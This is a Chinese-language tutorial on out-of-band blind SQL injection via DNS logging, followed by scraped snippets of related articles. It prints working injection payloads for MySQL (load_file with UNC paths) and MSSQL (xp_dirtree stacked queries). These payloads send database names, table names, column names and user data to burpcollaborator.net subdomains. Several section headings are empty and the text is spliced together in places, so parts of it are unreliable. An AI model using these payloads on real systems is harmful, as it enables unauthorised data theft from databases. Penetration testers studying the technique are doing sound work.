oxo1 前言
眾所周知盲注查詢資料賊慢,利用 dnslog 就可以快速解決這個問題,但是利用條件也挺雞肋的。具體原理請谷歌
1、secure_file_priv 不能為 null
2、支援 windows,不支援 linux
oxo2 工具
oxo3 mysql
1、獲取當前資料庫
' and load_file(concat('\\\\',(database()),'.8enqwp3jaapnlvk6adhsaym9q0wqkf.burpcollaborator.net\\abc'))--+因為有特殊符號需要編碼來傳輸,上面的是 hex ,解碼得到 root@localhost3、獲取表名
4、獲取列名' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'.7v3pdokir96m2u15rcyrrx387zdr1g.burpcollaborator.net\\abc'))--+
5、獲取資料
1、獲取庫名
2、獲取表名
3、獲取列名
4、獲取資料declare @host varchar(1024);select @host=convert(varchar(1024),(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name!='id'))+'.p0qgrjkjvnnqxa7krdxd60peg5mvak.burpcollaborator.net';exec('master..xp_dirtree"\\'+@host+'\foobar$"');oxo5 參考declare @host varchar(1024);select @host=convert(varchar(1024),(select top 1 username from users))+'.xuv0qxkeb8f32x8ko2gfihaeo5uvik.burpcollaborator.net';exec('master..xp_dirtree"\\'+@host+'\foobar$"');SQL盲注 時間盲注,dnslog盲注
時間盲注原理 id get id sql select from users where id id limit 0,1 result mysql query sql row mysql fetch array result if row else 存在sql注入漏洞 然而頁面不會回顯資料,也不會回...
dnslog盲注原理
布林盲注和時間盲注相當於猜單詞的遊戲,我們需要對每一位逐步的猜測,效率很低,需要傳送很多的請求進行判斷,很可能會觸發安全裝置的防護 我們需要一種方式能夠減少請求,直接回顯資料 dnslog注入 dns在解析的時候會留下日誌,通過讀取多級網域名稱的解析日誌,獲取請求資訊 登入 並註冊,得到屬於自己的i...
sql盲注特點 SQL盲注
盲注原理 盲注的分類 盲注常用函式 一 sql盲注概述 1.如果資料庫執行返回結果時只反饋對錯不會返回資料庫中的資訊 此時可以採用邏輯判斷是否正確的盲注來獲取資訊。2.盲注是不能通過直接顯示的途徑來獲取資料庫資料的方法。在盲注中,攻擊者根據其返回頁面的不同來判斷資訊 可能是頁面內容的不同,也可以是響...